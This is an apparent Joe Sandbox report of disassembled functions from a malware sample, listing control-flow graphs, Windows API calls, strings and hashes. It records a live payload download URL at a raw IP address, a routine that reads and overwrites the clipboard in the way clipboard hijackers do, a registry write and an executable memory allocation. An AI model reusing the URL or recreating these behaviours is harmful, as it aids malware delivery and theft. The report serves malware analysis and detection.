                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastThread
                                                                                                    • String ID: F(@
                                                                                                    • API String ID: 1611280651-2698495834
                                                                                                    • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                    • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                                                                    • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                    • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 452 42e185-42e188 436->452 443 42e176 437->443 444 42e14a-42e167 CreateThread 437->444 445 42e178-42e184 call 42e03d 443->445 447 42e189-42e18e 444->447 448 42e169-42e175 GetLastError call 42ea93 444->448 445->452 450 42e190-42e193 447->450 451 42e195-42e197 447->451 448->443 450->451 451->445
                                                                                                    APIs
                                                                                                    • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                                                                    • __dosmaperr.LIBCMT ref: 0042E170
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateErrorLastThread__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 2744730728-0
                                                                                                    • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                    • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                                                                    • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                    • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 461 4347a7-4347b1 459->461 462 434798-4347a5 GetLastError call 42ea93 459->462 466 43477a-43477e 460->466 465 4347b3-4347c8 461->465 461->466 462->466 468 4347cd-4347d2 465->468 466->468
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                                                                    • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                                                                    • __dosmaperr.LIBCMT ref: 0043479F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 2336955059-0
                                                                                                    • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                    • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                                                                    • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                    • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
                                                                                                    APIs
                                                                                                    • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
                                                                                                    • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1818849710-0
                                                                                                    • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                    • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                                                                    • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                    • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 484 42e0b4-42e0ba 481->484 485 42e0a9-42e0ab 481->485 482->481 484->478 487 42e0bc-42e0be 484->487 485->484 486 42e0ad-42e0ae CloseHandle 485->486 486->484 487->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 487->488
                                                                                                    APIs
                                                                                                      • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                      • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                                                      • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                    • ExitThread.KERNEL32 ref: 0042E086
                                                                                                    • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                                                                    • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1198197534-0
                                                                                                    • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                    • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                                                                    • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                    • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 498 4023eb-40255f call 4010ba call 4029f4 496->498 498->492
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00402563
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostProcQuitWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3873111417-0
                                                                                                    • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                    • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                                                                    • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                    • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Sleep
                                                                                                    • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                    • API String ID: 3358372957-3120454669
                                                                                                    • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                    • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                                                    • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                    • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0040298F
                                                                                                    • __fassign.LIBCMT ref: 0040299F
                                                                                                      • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 2843524283-0
                                                                                                    • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                    • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                    • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                    • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000400,?,?,00640223,?,?), ref: 00640E19
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00640223,?,?), ref: 00640E1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                    • Instruction ID: 9bb0fc5bdf39d04da418969fe6fec6b95a33c1f9cb9bad2f099070701520bf8f
                                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                    • Instruction Fuzzy Hash: 03D0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                    • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                                                    • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                    • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2638373210-0
                                                                                                    • Opcode ID: ae28107bb38a900418e0b1428c7e4b57fcb50d02a249da01d918ae7efc1c86db
                                                                                                    • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                    • Opcode Fuzzy Hash: ae28107bb38a900418e0b1428c7e4b57fcb50d02a249da01d918ae7efc1c86db
                                                                                                    • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                    APIs
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 323602529-0
                                                                                                    • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                    • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                    • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                    • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3_catch
                                                                                                    • String ID:
                                                                                                    • API String ID: 3886170330-0
                                                                                                    • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                    • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                                                    • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                    • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                    • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                                                    • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                    • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                    • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                                                                    • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                    • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                    • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                                                                    • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                    • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw
                                                                                                    • String ID:
                                                                                                    • API String ID: 2005118841-0
                                                                                                    • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                    • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                                                                    • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                    • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                    • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                    • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                    • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 006004B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569778024.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_600000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction ID: aed812faf7353c03ea0fd1bc386b58a236002c97366a6bb8a7a8ea6ff2dfc3cf
                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                    • Instruction Fuzzy Hash: 2B113C79A40208EFDB01DF98C985E99BBF5EF08350F058094FA489B362D775EA50DF84
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0064194D
                                                                                                    • Sleep.KERNEL32(00001541), ref: 00641957
                                                                                                      • Part of subcall function 0064CE77: _strlen.LIBCMT ref: 0064CE8E
                                                                                                    • OpenClipboard.USER32(00000000), ref: 00641984
                                                                                                    • GetClipboardData.USER32(00000001), ref: 00641994
                                                                                                    • _strlen.LIBCMT ref: 006419B0
                                                                                                    • _strlen.LIBCMT ref: 006419DF
                                                                                                    • _strlen.LIBCMT ref: 00641B23
                                                                                                    • EmptyClipboard.USER32 ref: 00641B39
                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000001), ref: 00641B46
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00641B70
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00641B79
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00641B80
                                                                                                    • CloseClipboard.USER32 ref: 00641BA4
                                                                                                    • Sleep.KERNEL32(000002D2), ref: 00641BAF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                    • String ID: 4#E$i
                                                                                                    • API String ID: 4246938166-2480119546
                                                                                                    • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                    • Instruction ID: 2a7ef83560008078e2f3f9eecb0a771b336585290ad905d5e3e539ae886ff214
                                                                                                    • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                    • Instruction Fuzzy Hash: DC51F330C01785DAE311DFA4ED46BED7774FF2A302F045228E805A6263EB709AC5C769
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0064239C
                                                                                                    • GetClientRect.USER32(?,?), ref: 006423B1
                                                                                                    • GetDC.USER32(?), ref: 006423B8
                                                                                                    • CreateSolidBrush.GDI32(00646464), ref: 006423CB
                                                                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 006423EA
                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0064240B
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00642416
                                                                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 0064241F
                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 00642443
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 006424CE
                                                                                                    • _wcslen.LIBCMT ref: 006424E6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569875271.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_640000_IH5XqCdf06.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1529870607-0
                                                                                                    • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                    • Instruction ID: 91c980597863d2ce86a959b5393b3b53598d4f8107d2723ca6435f3b4ae143c8
                                                                                                    • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                    • Instruction Fuzzy Hash: 4E71FC72900218AFDB62DF64DD85FAEB7BCEB09711F0042A5B509E6151DA70AF80CF24
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4569407993.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_IH5XqCdf06.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __floor_pentium4
                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                    • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                    • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                                                    • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                    • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                                                    APIs
                                                                                                      • Part of subcall function 00672141: GetLastError.KERNEL32(?,?,0066A9EC,?,00000000,?,0066CDE6,0064247E,00000000,?,00451F20), ref: 00672145
                                                                                                      • Part of subcall function 00672141: _free.LIBCMT ref: 00672178
                                                                                                      • Part of subcall function 00672141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 006721B9
                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00670A23,?,?,?,?,0067047A,?,00000004), ref: 0067B353
